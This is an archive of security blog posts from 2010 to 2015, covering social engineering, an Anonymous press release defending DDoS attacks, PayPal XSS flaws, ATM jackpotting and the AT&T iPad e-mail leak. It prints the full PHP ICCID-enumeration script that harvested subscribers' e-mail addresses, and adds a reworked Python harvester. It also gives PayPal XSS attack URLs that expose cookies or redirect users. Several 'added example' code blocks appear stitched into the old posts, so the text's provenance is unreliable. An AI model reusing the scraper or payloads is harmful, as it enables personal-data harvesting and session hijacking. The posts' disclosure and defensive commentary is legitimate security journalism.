Prefect – Praetorian Prefect http://www.praetorianprefect.com "Information Security, a little slower...a little deeper" Mon, 23 Mar 2015 03:40:55 +0000 en-US hourly 1

Jimmy Kimmel Gets your Password http://www.praetorianprefect.com/2015/01/jimmy-kimmel-gets-your-password/ Sun, 18 Jan 2015 02:46:20 +0000 http://www.praetorianprefect.com/?p=80

It didn’t take a whole lot of social engineering for people to give up their passwords: ask them what the password consists of (like “it’s my cat’s name and birthday”), ask the cat’s name, ask a deflecting question, then ask for the birthday.

A Superbowl Wifi Problem http://www.praetorianprefect.com/2014/02/a-superbowl-wifi-problem/ Sun, 02 Feb 2014 05:21:00 +0000 http://www.praetorianprefect.com/?p=6

It’s an annual puff piece: whoever is in charge of security at the Super Bowl appears on the news in front of some barrier or computer screen, talking about the number of security guards, guard dogs, or whatever else passes as some grand measure of the ‘amount’ of security being applied.

And as with Super Bowl XLVII, when two students just walked right in to the game simply by acting like they belonged, a news feature on Super Bowl XLVIII shows why bragging about your security can backfire:


Yup, that’s Marko’s wifi (wireless network) password, written in clear text on the monitor in the corner of the shot, for anyone who doesn’t want to bother cracking it.

Two Jokers Social Engineer their way into the Superbowl http://www.praetorianprefect.com/2013/02/two-jokers-social-engineer-their-way-into-the-superbowl/ Sun, 10 Feb 2013 05:29:18 +0000 http://www.praetorianprefect.com/?p=10

Sneaking in near press/employee access points without going through them, zigzagging through corridors, and at one point carrying a box so someone opens a door for them, two jokers from Savannah State University social engineer their way into Super Bowl XLVII, for the most part simply by looking like they belong.

Anonymous Releases Very Unanonymous Press Release http://www.praetorianprefect.com/2010/12/anonymous-releases-very-unanonymous-press-release/ Fri, 10 Dec 2010 06:04:07 +0000 http://www.praetorianprefect.com/?p=33

Today, December 10th, Anonymous, an Internet gathering, released a press release which you can read below. In it, a description is provided of what Anonymous is about, what Operation Payback is, and where the media is getting it wrong. Also in it, its author forgot to remove his name from the PDF’s metadata.


Document Properties
Um, Alex Tapanaris…?
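The check that would have caught this before the file went out is a mechanical one: read every identity-bearing field out of the PDF and refuse to publish while any of them is populated. What follows is an added example, not code from this post or from anyone involved in the press release. It works on a constructed, uncompressed PDF (the name in it is made up), pulls the Info dictionary strings and the XMP dc:creator out with regular expressions, and blanks the Author string in place without changing the file’s length, because the xref table stores byte offsets and a shorter string would corrupt the file for strict readers. The function names are this example’s own.

```python
import re

# Constructed stand-in for a leaked document: a minimal, uncompressed PDF whose
# trailer points at an Info dictionary with an /Author entry. The name is made up.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Title (A Press Release) /Author (Jane Example) /Creator (Writer) /Producer (OpenOffice.org 3.2) >> endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

# The same constructed document with an XMP metadata stream appended: authoring
# tools usually write the name in both places, so scrubbing one is not enough.
SAMPLE_PDF_WITH_XMP = SAMPLE_PDF + b"""4 0 obj << /Type /Metadata /Subtype /XML >> stream
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF><rdf:Description>
<dc:creator><rdf:Seq><rdf:li>Jane Example</rdf:li></rdf:Seq></dc:creator>
</rdf:Description></rdf:RDF></x:xmpmeta>
endstream endobj
"""

INFO_KEYS = ("Title", "Author", "Subject", "Keywords", "Creator", "Producer")
# "/Key (literal string)" pairs; the string body may contain backslash escapes.
INFO_ENTRY = re.compile(
    rb"/(" + b"|".join(k.encode() for k in INFO_KEYS) + rb")\s*\(((?:\\.|[^\\)])*)\)"
)
XMP_CREATOR = re.compile(rb"<dc:creator>.*?<rdf:li>(.*?)</rdf:li>", re.S)
IDENTITY_KEYS = ("Author", "xmp:creator")


def metadata_fields(data: bytes) -> dict:
    """Collect Info-dictionary strings and the XMP dc:creator from raw PDF bytes."""
    fields = {m.group(1).decode(): m.group(2).decode("latin-1")
              for m in INFO_ENTRY.finditer(data)}
    m = XMP_CREATOR.search(data)
    if m:
        fields["xmp:creator"] = m.group(1).decode("utf-8", "replace")
    return fields


def identity_leaks(data: bytes) -> list:
    """Names of identity-bearing fields that still carry a non-blank value."""
    fields = metadata_fields(data)
    return [k for k in IDENTITY_KEYS if fields.get(k, "").strip()]


def blank_info_strings(data: bytes, keys=("Author",)) -> bytes:
    """Overwrite the chosen Info strings with spaces of exactly the same length.

    Same-length replacement keeps every xref byte offset valid; rewriting the
    file to a shorter form is a job for a real PDF library, not a regex.
    """
    def blank(m):
        if m.group(1).decode() not in keys:
            return m.group(0)
        whole = m.group(0)
        head = whole[:m.start(2) - m.start(0)]   # "/Author (" exactly as written
        return head + b" " * len(m.group(2)) + b")"
    return INFO_ENTRY.sub(blank, data)
```

Two caveats a practitioner should keep in mind: this only sees literal strings in uncompressed objects, so hex-encoded strings, object streams (PDF 1.5 and later) and compressed XMP need a proper parser or a tool like exiftool; and as the second sample shows, blanking the Info dictionary leaves the XMP copy of the name untouched, which is why the leak check runs after the scrub, not instead of it.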


Full Press Release Text

ANON OPS: A Press Release December 10, 2010

Who is Anonymous

In their most recent public statement, WikiLeaks is the only group of people to identify Anonymous correctly. Anonymous is not a group, but rather an Internet gathering.

Both Anonymous and the media that is covering it are aware of the perceived dissent between individuals in the gathering. This does not, however, mean that the command structure of Anonymous is failing for a simple reason: Anonymous has a very loose and decentralized command structure that operates on ideas rather than directives.

We do not believe that a similar movement exists in the world today and as such we have to learn by trial and error. We are now in the process of better communicating some core values to the individual atoms that comprise Anonymous – we also want to take this opportunity to communicate a message to the media, so that the average Internet Citizen can get to know who we are and what we represent.

Anonymous is not a group of hackers. We are average Internet Citizens ourselves and our motivation is a collective sense of being fed up with all the minor and major injustices we witness every day.

We do not want to steal your personal information or credit card numbers. We also do not seek to attack critical infrastructure of companies such as Mastercard, Visa, PayPal or Amazon. Our current goal is to raise awareness about WikiLeaks and the underhanded methods employed by the above companies to impair WikiLeaks’ ability to function.

What is Operation: Payback

As stated above, the point of Operation: Payback was never to target critical infrastructure of any of the companies or organizations affected. Rather than doing that, we focused on their corporate websites, which is to say, their online “public face”. It is a symbolic action – as blogger and academic Evgeny Morozov put it, a legitimate expression of dissent.

The background to the attacks on PayPal and the calls to attack Amazon.com

Amazon, which was until recently WikiLeaks’ DNS provider, was one of the first companies to drop support for WikiLeaks. On December 9th, BusinessInsider.com reported that Amazon.co.uk were hosting the recently leaked diplomatic cables in e-book form. (Amazon.co.uk has since ceased selling the bundle of the diplomatic cables.)

After this piece of news circulated, parts of Anonymous on Twitter asked for Amazon.com to be targeted. The attack never occurred.

While it is indeed possible that Anonymous may not have been able to take Amazon.com down in a DDoS attack, this is not the only reason the attack never occurred. After the attack was so advertised in the media, we felt that it would affect people such as consumers in a negative way and make them feel threatened by Anonymous. Simply put, attacking a major online retailer when people are buying presents for their loved ones, would be in bad taste.

The continuing attacks on PayPal are already tested and preferable: while not damaging their ability to process payments, they are successful in slowing their network down just enough for people to notice and thus, we achieve our goal of raising awareness.

Related Coverage

  • http://paulrankin.tumblr.com/post/2166282743/anonymous-has-supposedly-released-a-press-release
Paypal Sender Country XSS http://www.praetorianprefect.com/2010/10/paypal-sender-country-xss/ Wed, 06 Oct 2010 06:18:02 +0000 http://www.praetorianprefect.com/?p=37

A new XSS vulnerability was identified on Paypal.com earlier today, found by d3v1l and disclosed on both Security-Shell and XSSed. The problem is with the parameter sender_country in a transaction called nvpsm. NVP is PayPal’s API for merchants to use when interacting with the PayPal web site; it stands for Name-Value Pair. SM is short for ‘send money’. A problem such as this can be used to capture a user’s session (essentially log in as that user) and perform privileged actions (money transfers) as that user, or to send a user a valid PayPal URL that then redirects them to a malicious third-party site (phishing, malware, etc.).

Attack String
The following is provided as an example in the posts mentioned earlier:

https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=">XSS PAYLOAD

Which results in:

Javascript injected into the name value pair of sender country is reflected on the resulting page.

Paypal is reflecting the supplied script in the error message they are displaying, as seen in the HTML source of the page:

Error COWException: invalid country "">XSS PAYLOAD"

Rather than display an alert box, an actual attacker would either redirect the user as shown below, or capture and send their session cookie (a piece of text the browser stores temporarily to identify a user’s logged in session) to a third party web site.

Redirection
https://mobile.paypal.com/nvpsm?amount=50.0&currency_code=USD&sender_country=%22%3E%22%22%3E%3E%3E%3E%3Cmeta%20http-equiv=%22Refresh%22%20content=%220;url=http://www.google.com/%22%3E%20%22%22

Session Cookie
https://www.sandbox.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=">

Same javascript alert, but displaying all of the user’s cookies under the PayPal domain.

XSS at a High Level
While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.

PayPal
The San Jose-based company is owned by eBay, has more than 78 million customer accounts, and is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion dollars moved through Paypal’s systems.

Paypal does make available additional authentication protection in the form of a one time password token called a ’security key’ by them (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. Paypal however allows a bypass of this hard token by allowing the user to enter further information such as credit card or bank number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication as is possible in a cross site scripting attack like this one.

It is worth noting that PayPal is PCI compliant, being subject to quarterly vulnerability scans, as stated on their site.

Finally
Users have the ability to go through a process to apply for a refund from PayPal if their account is broken into, but this is not always a clean process. A site should almost never reflect (redisplay) input received from an untrusted source (“the user”), which in this case is the browser, without escaping the output. PayPal has had similar problems with cross site scripting in the past, including an incident back in March. While XSS attacks can be downplayed, a site such as PayPal that performs money transfers (for users of eBay it is basically the only way to send and receive payment) usually has to address these problems quickly. A more comprehensive approach (a shared function that encodes all output originating from untrusted input on the site) is something they could start looking towards to protect their users.

Turning an ATM into a Slot Machine http://www.praetorianprefect.com/2010/07/turning-an-atm-into-a-slot-machine/ Wed, 28 Jul 2010 06:40:51 +0000 http://www.praetorianprefect.com/?p=50

Security researcher Barnaby Jack, currently at IOActive but a veteran of Foundstone, eEye, and Juniper with almost ten years in the industry, has demonstrated two exploit methods for ATMs (Automated Teller Machines) in a presentation that is thus far the talk of the Black Hat 2010 conference. In a talk originally slated for last year before it was muffled by Juniper over the concerns of “an affected ATM vendor”, Jack demonstrates what he calls jackpotting an ATM.

Here’s the ATM “jackpot” (music playing, money flying out, word ‘Jackpot’ displayed on the console):

The Attack
The attack was carried out with two custom tools Jack developed: Scrooge, an ATM firmware rootkit (malicious software that conceals itself in the layer between the operating software and the hardware), and Dillinger (named for the famous bank robber), a remote ATM attack tool that keeps track of compromised machines and stores the data stolen from people who use them. The first exploit involved unlocking a panel on the ATM and inserting a USB key that overwrites the machine’s native firmware with the rootkit, taking control of the ATM.

Research
To perform the research, Jack acquired physical ATMs, attached a debugger to the ATM motherboard, and reverse engineered the machine’s firmware. He then developed a replacement version (the aforementioned Scrooge software). Firmware is the small footprint of code (programs, data structures) that provides the internal control of an electronic device; in other words, the low-level operations of the device.

In the models Jack tested he was able, after reaching the machine’s USB ports with a master key purchased online, to replace the firmware with his rootkit version. The ATMs include the ability to do this so that firmware updates can be applied by those performing maintenance on the machine. However, there was no integrity check to ensure that the code update came from a trusted source.

The keys themselves for the cabinets are not hard to acquire.

Mitigation
In response, ATM vendors have released new firmware that requires future updates to carry a digital signature: the vendor signs each image with a private key it keeps to itself, and the machine checks the signature against a public verification key built into it before accepting the image. A signature is not a shared secret; the key held by the ATM only verifies, so reading it out of a machine does not let anyone sign. Done properly, this blocks the kind of rogue USB update Jack performed, as long as the vendor’s private signing key stays private and the machine actually refuses to run an image that fails the check.
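To make the mitigation concrete, here is an added example of the update check described above, written for this page rather than taken from any ATM vendor or from Jack’s research. It keeps to the Python standard library, so the signature scheme is textbook RSA over a SHA-256 digest, with no padding; real firmware signing uses a padded scheme such as RSA-PSS or ECDSA and a defined image format, and this toy should not be reused for anything else. The `Atm` class, the key generation routine and the firmware strings are all assumptions made for the illustration. What the example does show is the property that matters: the machine holds only the public key, a tampered image or an image signed by anyone but the vendor is refused, and the running firmware is left untouched.

```python
import hashlib
import random

_rng = random.SystemRandom()


def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin primality test (trial division first for small factors)."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = _rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False            # witness found: n is composite
    return True


def _random_prime(bits: int) -> int:
    """Random odd prime of exactly `bits` bits."""
    while True:
        candidate = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate


def generate_vendor_keypair(bits: int = 1024):
    """Return (public_key, private_key) as (n, e) and (n, d). Toy textbook RSA."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:      # e is prime, so this guarantees gcd(e, phi) == 1
            break
    n = p * q
    d = pow(e, -1, phi)
    return (n, e), (n, d)


def _digest_int(image: bytes) -> int:
    """SHA-256 of the firmware image as an integer (256 bits, so always < n)."""
    return int.from_bytes(hashlib.sha256(image).digest(), "big")


def sign_image(private_key, image: bytes) -> int:
    """Vendor side: sign the digest of the image with the private exponent."""
    n, d = private_key
    return pow(_digest_int(image), d, n)


def signature_valid(public_key, image: bytes, signature: int) -> bool:
    """Device side: recover the digest with the public exponent and compare."""
    n, e = public_key
    return 0 < signature < n and pow(signature, e, n) == _digest_int(image)


class Atm:
    """Hypothetical update path: the only key on the machine is the vendor's public key."""

    def __init__(self, vendor_public_key):
        self.vendor_public_key = vendor_public_key   # burned in at manufacture, not secret
        self.firmware = b"vendor firmware v1"        # constructed placeholder image

    def apply_update(self, image: bytes, signature: int) -> bool:
        """Install `image` only if the vendor's signature over it checks out."""
        if not signature_valid(self.vendor_public_key, image, signature):
            return False                             # refuse, keep running the current image
        self.firmware = image
        return True
```

The check must sit in front of the write to flash, not behind it: a machine that copies the image first and validates later has already lost. The other half of the control lives with the vendor, whose private key should be in an HSM or an offline signing host, because a leaked signing key turns every fielded machine back into the unsigned case.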

Breadth
While Jack wouldn’t reveal the names of the ATM vendors whose devices he compromised (they are reported to be Triton and Tranax machines), he has noted that he has compromised every ATM he has tested, intimating that attacks on multiple machines are possible because of similarities in the way generic ATMs are made. He did note the external limitations of his research, citing the fact that there are only so many ATMs you can put in an apartment before “your girlfriend gets mad”.

Jack actually told the delivery man who brought the ATMs that he was getting them because he wanted to avoid bank withdrawal fees.

Remote Attack
A remote attack was also demonstrated over wifi, but many of the details have not yet been released. Testing on his own machines, Jack found a way to bypass the ATM’s remote authentication so that the same homemade rootkit, Scrooge, could be installed. This essentially provides access to an ATM over a network connection, allowing results such as recording card numbers and PINs on entry and sending them to a remote attacker. Such vulnerable ATMs could be located with a war dialing tool, calling thousands of phone numbers until a vulnerable machine responds via modem, a technique already in use by criminals.

“Sometimes you have to demo a threat to spark a solution,”
Barnaby Jack

It is a resonant and powerful image of insecurity: a demonstrated attack that spews money out of an ATM in a few seconds, and a second one that doesn’t even require physical access to the machine. At this point the vendors’ response time, as well as the vulnerability demonstrated via USB, border on negligence: a master key that is readily available, and USB-based firmware updates without any signing mechanism to ensure that the update is an ‘approved’ one.

We have here, after all, a device whose sole purpose is to dispense cash.

Last year an ATM vendor got the talk pulled from Black Hat by pressuring Jack’s employer, Juniper Networks, despite having seven months of notification from Jack to arrive at some sort of response before the scheduled talk. Given we are now some one and a half years from notification, and given the quantity and dispersal of ATMs out there, the vulnerabilities demonstrated are likely still viable.

114,000 iPad Owners: The Script that Harvested Their E-mail Addresses http://www.praetorianprefect.com/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/ Wed, 09 Jun 2010 07:15:04 +0000 http://www.praetorianprefect.com/?p=69

Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel, had their e-mail addresses revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:


<?php
// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)
$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
$counter = 0; //Loop counter (uninitialized in the copy as posted)
function genluhn($number){ //Crappy home-made Luhn checkdigit generator
$array = array();
$total = 0;
$i = strlen($number)-1;
do { //Reverse the digits so index 0 is the rightmost one
$array[] = $number[$i];
$i--;
} while ($i > -1);
$i = 0;
foreach ($array as $digit) {
if (!($i & 1)){ //Double the rightmost digit and every second one leftwards
$digit = $digit * 2;
if ($digit >= 10) {
$digit = $digit - 9;
}
}
$total += $digit;
$i++;
}
$luhn = 10 - ($total % 10);
if ($luhn == 10) $luhn=0;
return $luhn;
}
while (1) { //Continue FOREVER
$ch = curl_init(); //Set up cURL
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
$ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to the ICCID
curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0");
$output = curl_exec($ch); //Load first page with ICCID
curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
$output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET'd info
curl_close($ch);
//print $output; //Prints HTML result
if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just to keep track of how far the script has gotten
//Parse output. Terribly sloppy
if (preg_match("/<title>Error<\/title>/", $output, $match)) {
preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, $match);
$match[0] = preg_replace("/<div class=\"info-container\">\n\s\s /","",$match[0]);
$match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I want space between the period and the next sentence, dammit
$errnum = strip_tags($match[0]);
$status = "Error! ".$errnum; //Return specific error message
} else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", $output, $match)) { //Angle brackets serve as the regex delimiters here
$match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/","",$match[0]);
$status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); //Return email address
} else {
$status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix.
}
if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
if ($counter == $ICCIDcount) exit;
$ICCIDroot++; //step ICCID
$counter++; //step loop counter
}
?>

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at att.com was:

https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

And that’s it: an e-mail address gets returned on the successful iterations (active ICCID) and parsed. There’s no complex hack, no real infiltration or defeat of an authentication mechanism, and no breach, just a really poorly designed web application that returns an e-mail address when an ICCID is passed to it.
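The reason no hack was needed is worth seeing in code: ICCIDs are assigned sequentially and end in a public Luhn check digit, so the whole “key space” can be generated offline and walked in order. The block below is an added example written for this page, not the Goatse Security script and not AT&T’s code. It gives a clean version of the check-digit routine the script does by hand, the enumerator that turns a base into consecutive ICCIDs, the parse of the pre-filled e-mail field, and a harvest loop driven by a constructed stub responder in place of the two cURL requests. The sample ICCID base, the page bodies and the address in them are all made up.

```python
import re


def luhn_check_digit(payload: str) -> int:
    """Luhn check digit for a string of decimal digits.

    Walk the payload from the right: the digit next to the check position is
    doubled (subtract 9 if that exceeds 9), and so is every second digit after it.
    """
    total = 0
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return (10 - total % 10) % 10


def luhn_valid(number: str) -> bool:
    """True if the last digit is the correct Luhn check digit for the rest."""
    return number[-1] == str(luhn_check_digit(number[:-1]))


def iccid_range(base: str, count: int):
    """Yield `count` consecutive ICCIDs (base + check digit) starting at `base`.

    Consecutive SIMs get consecutive bases and the check digit is computable,
    so this generator is the entire search space an attacker has to cover.
    """
    start, width = int(base), len(base)
    for n in range(start, start + count):
        payload = str(n).zfill(width)
        yield payload + str(luhn_check_digit(payload))


# Looser stand-in for the script's regex: the pre-filled e-mail input on the page.
EMAIL_FIELD = re.compile(r'<input[^>]*\bid="email"[^>]*\bvalue="([^"]*@[^"]*)"', re.I)


def extract_email(page: str):
    """Return the address pre-filled in the page's email input, or None."""
    m = EMAIL_FIELD.search(page)
    return m.group(1) if m else None


def harvest(base: str, count: int, fetch) -> dict:
    """Enumerate ICCIDs and collect every address the responder hands back.

    `fetch(iccid)` returns a page body; in the original script that was two cURL
    requests per ICCID, here it is whatever callable the caller supplies.
    """
    found = {}
    for iccid in iccid_range(base, count):
        email = extract_email(fetch(iccid))
        if email:
            found[iccid] = email
    return found


# Constructed sample data: an arbitrary 18-digit base and two fake responses
# modelled on the markup the script parses (one active subscriber, rest unknown).
SAMPLE_BASE = "890141032111185107"
ACTIVE_PAGE = ('<form><input id="email" name="email" type="email" placeholder="Required" '
               'value="subscriber@example.com" autocapitalization="off" autocorrect="off"></form>')
INACTIVE_PAGE = "<html><head><title>Error</title></head><body>Unknown ICCID</body></html>"
SAMPLE_IDS = list(iccid_range(SAMPLE_BASE, 4))
SAMPLE_RESPONSES = {SAMPLE_IDS[2]: ACTIVE_PAGE}


def sample_fetch(iccid: str) -> str:
    """Stub for the network call: look the ICCID up in the constructed responses."""
    return SAMPLE_RESPONSES.get(iccid, INACTIVE_PAGE)
```

The defensive reading is the mirror image: an identifier that is sequential and self-checking is not a secret, so a page that hands back personal data for it needs an authenticated session behind it, not just a plausible user-agent string.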

Thou Shalt Not Send Naked Pictures…To Anyone Ever http://www.praetorianprefect.com/2010/05/thou-shalt-not-send-naked-picturesto-anyone-ever/ Wed, 26 May 2010 05:39:22 +0000 http://www.praetorianprefect.com/?p=12

It’s becoming a familiar story: an angry parent of a student reports finding inappropriate images, self-taken naked pictures and videos, on that student’s cell phone. The images and video were sent to the student by a high school football coach. The mother of the student e-mailed the pictures to the administration of the high school, and the coach was promptly fired in disgrace. But this story has an unusual wrinkle: the student is a 20 year-old at the University of Central Florida, the girlfriend of 32 year-old Mandarin High School football coach Jason Robinson.

Upon finding the pictures, the mother of Jason Robinson’s college age girlfriend fired the images off to the administration at the High School employing this coach. The administration reacted by terminating Robinson, who being within the first three years of his contract there was essentially the equivalent of an “at-will” employee.

The high school principal, Dr. Donna Richardson, fired off the following letter to the coach:

“Effective today you have been reassigned to Bulls Bay for the remainder of this school year. You are not to come back onto our campus, and we will make arrangements to get any of your personal belongings to you.

You are also being non-reappointed for the next school year. It is regretful it had to come to this, but I believe you understand the situation.”

“We hold our teachers to a higher standard. They are in front of our students. They’re talking with our students. They’re teaching our students how to become good characters”

Jason Robinson

So we are left with an ‘at will’ employee, who can be dismissed for any reason, being dismissed for showing a lack of sound judgment and a potential violation of a policy (which for whatever reason couldn’t be located in time to include in the letter). From a legal standpoint, the dismissal may be on solid enough ground.


The incident is problematic on a number of fronts though. As soon as an employing organization begins to pass judgment on the private, non-criminal, non-disallowed by policy, actions of two consenting adults, they open themselves up in an inappropriate role as a moral arbiter over their teachers and staff. The mother’s actions were largely inappropriate in the absence of a crime or high school policy violation regarding relationships between teachers and staff. There has been no indication yet that this relationship started when the girlfriend was a high school student herself. But since you can’t control parents, the high school board, a group of people, owed it to all involved to display a cooler head.

Robinson is claiming this incident has ruined his reputation, and is suing the parents of his 20 year old girlfriend for violating his privacy by looking at the material. It certainly does affect his future prospects in working as a high school football coach to be so publicly dismissed.

A sister of the girlfriend does attend high school at Mandarin also, probably another reason this should have been handled much more quietly, as her life must be a joy right now.

One Wrinkle Though
There is one awkward little wrinkle to the whole episode which may make the school board right (but which throws into question why they wouldn’t comment further to defend their position). There is an allegation that the coach used a school computer to send the images. If that is the case, a policy prohibiting using school equipment to view or send pornography should both be in place and apply (minus the publicity and ‘shaming’ e-mail).


So why isn’t that being included in the school’s response to the case? Either because it isn’t true, or because they haven’t conducted a responsible forensics investigation to back up the allegation. To fire someone so publicly without having this was a mistake. Administrative leave, strengthening the case via proper computer forensics, and then having a full story to go forward with is the correct way to go, not an e-mail sent in haste from the principal’s computer.

According to most followup commentary, the “sent from a school computer” piece likely is not true anyway.

Sexting
Basically the act of sending a sexually explicit photograph or message with mobile phones as the communication device. The name derives from a combination (or portmanteau for those who want to learn a new word) of the words sex and texting.

The first well known reference to the word is a 2005 article in the British Sunday Telegraph Magazine. In a survey conducted by Cosmogirl, 20% of teens and 33% of young adults indicated they had sent nude or semi-nude (big difference) pictures of themselves via electronic communications. Some 39% of teens and 59% of young adults had said they sent sexually explicit messages.

The Cosmogirl results have been thrown into question however (surveys always are); at least one sociologist, C.J. Pascoe, an assistant professor at Colorado College, completed a three year study interviewing 80 teenagers and found no evidence of truly explicit text or photographs sent via mobile devices.

From personal experience, students are certainly sending and posting information that their parents and other adults would note is probably a mistake to preserve electronically and share. Campaigns, such as the James Lipton campaign we posted about earlier, Don’t Tweet Your Junk, are largely a reaction to this problem.

So there is an issue here that should not be ignored, one that naturally followed the increasing capabilities of cell phones, the decreasing costs, and the result that more young people than ever have sophisticated access to communications technology (something their parents did not by and large have). That said, hyping the numbers by suggesting that 2 out of every 10 teens are sending naked pictures of themselves via their phones is unnecessarily alarmist.

The other, larger problem of overreaction is overzealous prosecution of teenagers under child pornography laws which were certainly not codified to cover teenagers e-mailing photographs to each other. Further, the classification of said teenagers or young adults as sex offenders serves only to weaken the notification requirements under Megan’s Law, designed to protect youth against real sex predators.

Finally
I don’t understand the proclivity of so many people for sending naked pictures of their junk to other people. Maybe if doing so will result in Paris Hilton-like publicity, but for most of us photographing our nether regions should be grounds for having our heads examined. That said, what we have here is two consenting adults sending content to each other. It was no more the high school’s business than it was the mother’s, unless a school computer was used.

One could make the loose case that the mother of a 20 year-old might have the moral authority to snoop to try to keep her daughter safe (we don’t really think so at 20, but we could see someone saying that). But sending the pictures on to the high school administration rather than handling this as a private family matter shows terrible judgment on the mother’s part. Parents can’t be controlled, though; the school had to realize a story as salacious as this would spawn media coverage, and should have had its act in order before reacting. If they have nothing, no evidence that this relationship started when the girl was underage or in high school, no use of a school computer established via evidence gathered in a forensically sound manner, then this school board has made a mistake.

Or as Principal Richardson defined the school’s mission: “They’re teaching our students how to become good characters”. They’re acting like characters all right, so far anyway.


XSS Flaw on PayPal.com http://www.praetorianprefect.com/2010/03/xss-flaw-on-paypal-com/ Fri, 26 Mar 2010 06:27:43 +0000 http://www.praetorianprefect.com/?p=43

Earlier today Wesley Kerfoot reported on the Full Disclosure mailing list that a page in the Paypal.com domain is susceptible to a non-persistent reflected cross site scripting attack (XSS). While non-persistent XSS bugs are somewhat common, this is quite serious for a site like PayPal, where user accounts are linked directly to bank accounts, debit, or credit cards and payment can be made to third parties without any additional authentication after user access is gained.

Update: As of 7pm EST, it appears that a mitigation has been implemented for this vulnerability on the PayPal web site where all requests to /xclick/business redirect to the PayPal homepage.

An attacker able to trick a user with a valid Paypal session into clicking a crafted version of the link below (wouldn’t be hard, think a link on an eBay auction listing or a phishing e-mail for example) could hijack the user’s session and initiate financial transactions on their behalf including money transfers. Alternatively this legitimate URL could be used to redirect the user to a spoofed PayPal web site designed to steal user credentials, which is a fairly common scam except in this case more effective as the user would see an actual PayPal URL to click on.

Attack String
The following string is provided as an example in the Full Disclosure posting:

https://www.paypal.com/xclick/business=<script> XSS PAYLOAD </script>

Which in turn results in this:

Javascript injected as part of a name-value pair is reflected on the resulting web page.

Of course where this works, this will just as easily work:

https://www.paypal.com/xclick/business=<script> alert(document.cookie); </script>

Which dutifully reflects back wrapped in a header tag on the resulting page:

<div class="legacyErrors " id="page">
<div id="header"><h1><script> alert(document.cookie); </script></h1></div>
<hr>
<div id="content">
<div id="headline">

And finally which displays the user’s logged in session information:

The result of injecting alert(document.cookie) into the same page for a logged in PayPal user.

